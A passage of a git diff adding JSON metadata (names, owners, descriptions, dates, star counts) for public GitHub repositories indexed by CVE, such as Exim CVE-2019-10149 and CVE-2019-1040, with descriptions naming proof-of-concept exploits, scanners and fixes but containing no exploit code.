"2019-06-10T19:37:05Z", + "updated_at": "2024-08-12T19:49:54Z", + "pushed_at": "2019-06-14T10:16:02Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 22, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 191493140, + "name": "eximrce-CVE-2019-10149", + "full_name": "cowbe0x004\/eximrce-CVE-2019-10149", + "owner": { + "login": "cowbe0x004", + "id": 3072913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3072913?v=4", + "html_url": "https:\/\/github.com\/cowbe0x004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowbe0x004\/eximrce-CVE-2019-10149", + "description": "simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in \/tmp\/eximrce.", + "fork": false, + "created_at": "2019-06-12T03:47:16Z", + "updated_at": "2024-08-12T19:49:58Z", + "pushed_at": "2019-07-08T18:25:12Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 191845568, + "name": "PoC--CVE-2019-10149_Exim", + "full_name": "MNEMO-CERT\/PoC--CVE-2019-10149_Exim", + "owner": { + "login": "MNEMO-CERT", + "id": 51804856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51804856?v=4", + "html_url": "https:\/\/github.com\/MNEMO-CERT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MNEMO-CERT\/PoC--CVE-2019-10149_Exim", + "description": "PoC for CVE-2019-10149, this vulnerability could be xploited betwen 4-87 to 4.91 version of Exim server.", + "fork": false, + "created_at": "2019-06-13T23:21:53Z", + "updated_at": "2024-08-12T19:50:02Z", + "pushed_at": "2019-06-18T14:57:22Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 191952969, + "name": "CVE-2019-10149-quick", + "full_name": "aishee\/CVE-2019-10149-quick", + "owner": { + "login": "aishee", + "id": 8377283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8377283?v=4", + "html_url": "https:\/\/github.com\/aishee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aishee\/CVE-2019-10149-quick", + "description": "Simple Bash shell quick fix CVE-2019-10149", + "fork": false, + "created_at": "2019-06-14T14:02:43Z", + "updated_at": "2024-08-12T19:50:04Z", + "pushed_at": "2019-06-14T14:03:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 194002154, + "name": "CVE-2019-10149-privilege-escalation", + "full_name": "AzizMea\/CVE-2019-10149-privilege-escalation", + "owner": { + "login": "AzizMea", + "id": 30970260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30970260?v=4", + "html_url": "https:\/\/github.com\/AzizMea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AzizMea\/CVE-2019-10149-privilege-escalation", + "description": "CVE-2019-10149 privilege escalation", + "fork": false, + "created_at": "2019-06-27T01:34:41Z", + "updated_at": "2024-08-12T19:50:30Z", + "pushed_at": "2019-06-27T17:46:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 198729185, + "name": "StickyExim", + "full_name": "Brets0150\/StickyExim", + "owner": { + "login": "Brets0150", + "id": 40045956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40045956?v=4", + "html_url": "https:\/\/github.com\/Brets0150", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brets0150\/StickyExim", + "description": "Exim Honey Pot for CVE-2019-10149 exploit attempts.", + "fork": false, + "created_at": "2019-07-25T00:46:37Z", + "updated_at": "2024-08-12T19:51:22Z", + "pushed_at": "2019-08-06T20:21:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 206647936, + "name": "exim.exp", + "full_name": "Chris-dev1\/exim.exp", + "owner": { + "login": "Chris-dev1", + "id": 36897897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36897897?v=4", + "html_url": "https:\/\/github.com\/Chris-dev1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chris-dev1\/exim.exp", + "description": "CVE-2019-10149", + "fork": false, + "created_at": "2019-09-05T20:04:14Z", + "updated_at": "2024-08-12T19:52:41Z", + "pushed_at": "2019-09-05T20:34:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 216513053, + "name": "CVE-2019-10149", + "full_name": "darsigovrustam\/CVE-2019-10149", + "owner": { + "login": "darsigovrustam", + "id": 36308333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36308333?v=4", + "html_url": "https:\/\/github.com\/darsigovrustam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darsigovrustam\/CVE-2019-10149", + "description": "Instructions for installing a vulnerable version of Exim and its expluatation", + "fork": false, + "created_at": "2019-10-21T08:13:27Z", + "updated_at": "2024-08-12T19:54:07Z", + "pushed_at": "2023-04-09T20:13:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 217788444, + "name": "CVE-2019-10149", + "full_name": "Diefunction\/CVE-2019-10149", + "owner": { + "login": "Diefunction", + "id": 17242631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17242631?v=4", + "html_url": "https:\/\/github.com\/Diefunction", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diefunction\/CVE-2019-10149", + "description": "CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in \/src\/deliver.c may lead to remote command execution.", + "fork": false, + "created_at": "2019-10-27T01:03:11Z", + "updated_at": "2024-08-12T19:54:17Z", + "pushed_at": "2021-06-04T18:15:44Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2019-10149", + "cve", + "cve-2019-10149", + "exim", + "exim-exploit", + "exploit" + ], + "visibility": "public", + "forks": 8, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 263372042, + "name": "CVE-2019-10149", + "full_name": "Dilshan-Eranda\/CVE-2019-10149", + "owner": { + "login": "Dilshan-Eranda", + "id": 57589896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57589896?v=4", + "html_url": "https:\/\/github.com\/Dilshan-Eranda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dilshan-Eranda\/CVE-2019-10149", + "description": "SNP Assignment on a Linux vulnerability", + "fork": false, + "created_at": "2020-05-12T15:11:54Z", + "updated_at": "2020-05-12T15:13:14Z", + "pushed_at": "2020-05-12T15:13:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 268969538, + "name": "exim-cve-2019-10149-data", + "full_name": "cloudflare\/exim-cve-2019-10149-data", + "owner": { + "login": "cloudflare", + "id": 314135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/314135?v=4", + "html_url": "https:\/\/github.com\/cloudflare", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cloudflare\/exim-cve-2019-10149-data", + "description": "Data Collection Related to Exim CVE-2019-10149", + "fork": false, + "created_at": "2020-06-03T02:27:01Z", + "updated_at": "2024-09-20T01:54:32Z", + "pushed_at": "2024-09-26T15:07:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 390790949, + "name": "CVE-2019-10149-Exploit", + "full_name": "Stick-U235\/CVE-2019-10149-Exploit", + "owner": { + "login": "Stick-U235", + "id": 28267481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28267481?v=4", + "html_url": "https:\/\/github.com\/Stick-U235", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stick-U235\/CVE-2019-10149-Exploit", + "description": "Exploit for CVE-2019-10149", + "fork": false, + "created_at": "2021-07-29T16:44:08Z", + "updated_at": "2023-03-07T12:29:36Z", + "pushed_at": "2021-07-29T16:44:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610601071, + "name": "EXIM-4.87-CVE-2019-10149", + "full_name": "rahmadsandy\/EXIM-4.87-CVE-2019-10149", + "owner": { + "login": "rahmadsandy", + "id": 57087446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57087446?v=4", + "html_url": "https:\/\/github.com\/rahmadsandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rahmadsandy\/EXIM-4.87-CVE-2019-10149", + "description": null, + "fork": false, + "created_at": "2023-03-07T05:09:08Z", + "updated_at": "2023-03-07T05:09:08Z", + "pushed_at": "2023-03-07T05:13:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709597996, + "name": "CVE-2019-10149", + "full_name": "hyim0810\/CVE-2019-10149", + "owner": { + "login": "hyim0810", + "id": 119393140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119393140?v=4", + "html_url": "https:\/\/github.com\/hyim0810", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hyim0810\/CVE-2019-10149", + "description": "CVE-2019-10149", + "fork": false, + "created_at": "2023-10-25T02:25:17Z", + "updated_at": "2023-10-25T02:30:14Z", + "pushed_at": "2023-10-25T17:08:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 853424899, + "name": "CVE-2019-10149", + "full_name": "qlusec\/CVE-2019-10149", + "owner": { + "login": "qlusec", + "id": 124287090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124287090?v=4", + "html_url": "https:\/\/github.com\/qlusec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qlusec\/CVE-2019-10149", + "description": "test POC for CVE-2019-10149", + "fork": false, + "created_at": "2024-09-06T16:21:17Z", + "updated_at": "2024-09-06T17:21:29Z", + "pushed_at": "2024-09-06T17:21:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893638527, + "name": "PoC_CVE-2019-10149--rce", + "full_name": "uyerr\/PoC_CVE-2019-10149--rce", + "owner": { + "login": "uyerr", + "id": 112896125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112896125?v=4", + "html_url": "https:\/\/github.com\/uyerr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uyerr\/PoC_CVE-2019-10149--rce", + "description": "Remote Command Execution into shell from a vulnerable exim service.", + "fork": false, + "created_at": "2024-11-24T23:44:51Z", + "updated_at": "2024-11-24T23:45:31Z", + "pushed_at": "2024-11-24T23:45:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10172.json b/2019/CVE-2019-10172.json new file mode 100644 index 0000000000..123b0d896d --- /dev/null +++ b/2019/CVE-2019-10172.json @@ -0,0 +1,33 @@ +[ + { + "id": 304001314, + "name": "CVE-2019-10172", + "full_name": "rusakovichma\/CVE-2019-10172", + "owner": { + "login": "rusakovichma", + "id": 4024331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4024331?v=4", + "html_url": "https:\/\/github.com\/rusakovichma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rusakovichma\/CVE-2019-10172", + "description": "CVE-2019-10172 PoC and Possible mitigations", + "fork": false, + "created_at": "2020-10-14T12:00:20Z", + "updated_at": "2023-06-02T09:23:32Z", + "pushed_at": "2020-10-14T12:07:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1020010.json b/2019/CVE-2019-1020010.json new file mode 100644 index 0000000000..2cc6c4be29 --- /dev/null +++ b/2019/CVE-2019-1020010.json @@ -0,0 +1,33 @@ +[ + { + "id": 348430849, + "name": "CVE-2019-1020010", + "full_name": "DXY0411\/CVE-2019-1020010", + "owner": { + "login": "DXY0411", + "id": 42259364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4", + "html_url": "https:\/\/github.com\/DXY0411", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXY0411\/CVE-2019-1020010", + "description": null, + "fork": false, + "created_at": "2021-03-16T17:13:32Z", + "updated_at": "2021-03-24T07:33:26Z", + "pushed_at": "2021-03-24T07:33:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10207.json b/2019/CVE-2019-10207.json new file mode 100644 index 0000000000..81b41ed949 --- /dev/null +++ b/2019/CVE-2019-10207.json @@ -0,0 +1,33 @@ +[ + { + "id": 199611138, + "name": "CVE-2019-10207", + "full_name": "butterflyhack\/CVE-2019-10207", + "owner": { + "login": "butterflyhack", + "id": 11525772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11525772?v=4", + "html_url": "https:\/\/github.com\/butterflyhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/butterflyhack\/CVE-2019-10207", + "description": "PoC for CVE-2019-10207", + "fork": false, + "created_at": "2019-07-30T08:39:21Z", + "updated_at": "2024-08-12T19:51:30Z", + "pushed_at": "2022-03-27T12:53:41Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10220.json b/2019/CVE-2019-10220.json new file mode 100644 index 0000000000..a3c5956f7e --- /dev/null +++ b/2019/CVE-2019-10220.json @@ -0,0 +1,64 @@ +[ + { + "id": 578462667, + "name": "linux-3.0.35_CVE-2019-10220", + "full_name": "Trinadh465\/linux-3.0.35_CVE-2019-10220", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-3.0.35_CVE-2019-10220", + "description": null, + "fork": false, + "created_at": "2022-12-15T05:37:10Z", + "updated_at": "2023-03-10T01:21:11Z", + "pushed_at": "2022-12-15T05:43:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623932677, + "name": "kernel_v4.1.15_CVE-2019-10220", + "full_name": "hshivhare67\/kernel_v4.1.15_CVE-2019-10220", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.1.15_CVE-2019-10220", + "description": null, + "fork": false, + "created_at": "2023-04-05T11:51:57Z", + "updated_at": "2023-04-05T11:57:44Z", + "pushed_at": "2023-04-05T11:55:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10392.json b/2019/CVE-2019-10392.json new file mode 100644 index 0000000000..8037c9962f --- /dev/null +++ b/2019/CVE-2019-10392.json @@ -0,0 +1,64 @@ +[ + { + "id": 211009198, + "name": "CVE-2019-10392", + "full_name": "jas502n\/CVE-2019-10392", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-10392", + "description": "CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)", + "fork": false, + "created_at": "2019-09-26T05:45:00Z", + "updated_at": "2024-08-12T19:53:22Z", + "pushed_at": "2019-09-26T05:49:21Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 211651844, + "name": "CVE-2019-10392_EXP", + "full_name": "ftk-sostupid\/CVE-2019-10392_EXP", + "owner": { + "login": "ftk-sostupid", + "id": 30171892, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30171892?v=4", + "html_url": "https:\/\/github.com\/ftk-sostupid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ftk-sostupid\/CVE-2019-10392_EXP", + "description": "Jenkins Git Client RCE CVE-2019-10392_Exp", + "fork": false, + "created_at": "2019-09-29T11:22:41Z", + "updated_at": "2024-08-12T19:53:28Z", + "pushed_at": "2019-10-21T02:02:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1040.json b/2019/CVE-2019-1040.json new file mode 100644 index 0000000000..2f2fca5a28 --- /dev/null +++ b/2019/CVE-2019-1040.json @@ -0,0 +1,157 @@ +[ + { + "id": 191930336, + "name": "CVE-2019-1040", + "full_name": "Ridter\/CVE-2019-1040", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/CVE-2019-1040", + "description": "CVE-2019-1040 with Exchange", + "fork": false, + "created_at": "2019-06-14T11:16:03Z", + "updated_at": "2024-11-04T18:58:55Z", + "pushed_at": "2021-06-18T18:43:46Z", + "stargazers_count": 249, + "watchers_count": 249, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 249, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 192532911, + "name": "CVE-2019-1040-dcpwn", + "full_name": "Ridter\/CVE-2019-1040-dcpwn", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/CVE-2019-1040-dcpwn", + "description": "CVE-2019-1040 with Kerberos delegation", + "fork": false, + "created_at": "2019-06-18T12:10:26Z", + "updated_at": "2024-01-04T16:35:01Z", + "pushed_at": "2021-06-18T18:43:46Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 192691928, + "name": "UltraRealy_with_CVE-2019-1040", + "full_name": "lazaars\/UltraRealy_with_CVE-2019-1040", + "owner": { + "login": "lazaars", + "id": 36127186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36127186?v=4", + "html_url": "https:\/\/github.com\/lazaars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lazaars\/UltraRealy_with_CVE-2019-1040", + "description": "Updated version for the tool UltraRealy with support of the CVE-2019-1040 exploit", + "fork": false, + "created_at": "2019-06-19T08:32:31Z", + "updated_at": "2024-08-12T19:50:14Z", + "pushed_at": "2019-06-19T09:15:16Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 193532426, + "name": "cve-2019-1040-scanner", + "full_name": "fox-it\/cve-2019-1040-scanner", + "owner": { + "login": "fox-it", + "id": 468621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4", + "html_url": "https:\/\/github.com\/fox-it", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fox-it\/cve-2019-1040-scanner", + "description": null, + "fork": false, + "created_at": "2019-06-24T15:33:50Z", + "updated_at": "2024-11-13T12:58:30Z", + "pushed_at": "2020-11-09T07:33:12Z", + "stargazers_count": 287, + "watchers_count": 287, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 287, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 325925728, + "name": "dcpwn", + "full_name": "QAX-A-Team\/dcpwn", + "owner": { + "login": "QAX-A-Team", + "id": 35417332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35417332?v=4", + "html_url": "https:\/\/github.com\/QAX-A-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QAX-A-Team\/dcpwn", + "description": "an impacket-dependent script exploiting CVE-2019-1040", + "fork": false, + "created_at": "2021-01-01T05:59:06Z", + "updated_at": "2024-01-04T16:53:34Z", + "pushed_at": "2021-01-01T06:10:58Z", + "stargazers_count": 72, + "watchers_count": 72, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 72, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10475.json b/2019/CVE-2019-10475.json new file mode 100644 index 0000000000..eab8182c9d --- /dev/null +++ b/2019/CVE-2019-10475.json @@ -0,0 +1,33 @@ +[ + { + "id": 220101094, + "name": "CVE-2019-10475", + "full_name": "vesche\/CVE-2019-10475", + "owner": { + "login": "vesche", + "id": 8083281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8083281?v=4", + "html_url": "https:\/\/github.com\/vesche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vesche\/CVE-2019-10475", + "description": null, + "fork": false, + "created_at": "2019-11-06T22:19:01Z", + "updated_at": "2024-08-12T19:54:37Z", + "pushed_at": "2022-01-26T17:08:27Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1064.json b/2019/CVE-2019-1064.json new file mode 100644 index 0000000000..b3a3000669 --- /dev/null +++ b/2019/CVE-2019-1064.json @@ -0,0 +1,95 @@ +[ + { + "id": 191548642, + "name": "CVE-2019-1064", + "full_name": "RythmStick\/CVE-2019-1064", + "owner": { + "login": "RythmStick", + "id": 43847240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43847240?v=4", + "html_url": "https:\/\/github.com\/RythmStick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RythmStick\/CVE-2019-1064", + "description": "CVE-2019-1064 Local Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2019-06-12T10:21:35Z", + "updated_at": "2024-08-12T19:49:58Z", + "pushed_at": "2019-06-13T09:55:07Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 191602145, + "name": "CVE-2019-1064", + "full_name": "0x00-0x00\/CVE-2019-1064", + "owner": { + "login": "0x00-0x00", + "id": 23364530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2019-1064", + "description": "CVE-2019-1064 Local Privilege Escalation Vulnerability", + "fork": false, + "created_at": "2019-06-12T15:54:55Z", + "updated_at": "2024-08-12T19:49:59Z", + "pushed_at": "2019-06-12T12:25:42Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 192173000, + "name": "CVE-2019-1064", + "full_name": "attackgithub\/CVE-2019-1064", + "owner": { + "login": "attackgithub", + "id": 45205753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45205753?v=4", + "html_url": "https:\/\/github.com\/attackgithub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/attackgithub\/CVE-2019-1064", + "description": "CVE-2019-1064 - AppXSVC Local Privilege Escalation", + "fork": false, + "created_at": "2019-06-16T09:31:11Z", + "updated_at": "2024-08-12T19:50:07Z", + "pushed_at": "2019-06-14T07:47:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-10678.json b/2019/CVE-2019-10678.json new file mode 100644 index 0000000000..5be0bf16e6 --- /dev/null +++ b/2019/CVE-2019-10678.json @@ -0,0 +1,33 @@ +[ + { + "id": 185265234, + "name": "cve-2019-10678", + "full_name": "cved-sources\/cve-2019-10678", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2019-10678", + "description": "cve-2019-10678", + "fork": false, + "created_at": "2019-05-06T20:15:47Z", + "updated_at": "2024-08-12T19:48:39Z", + "pushed_at": "2021-04-15T22:53:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + 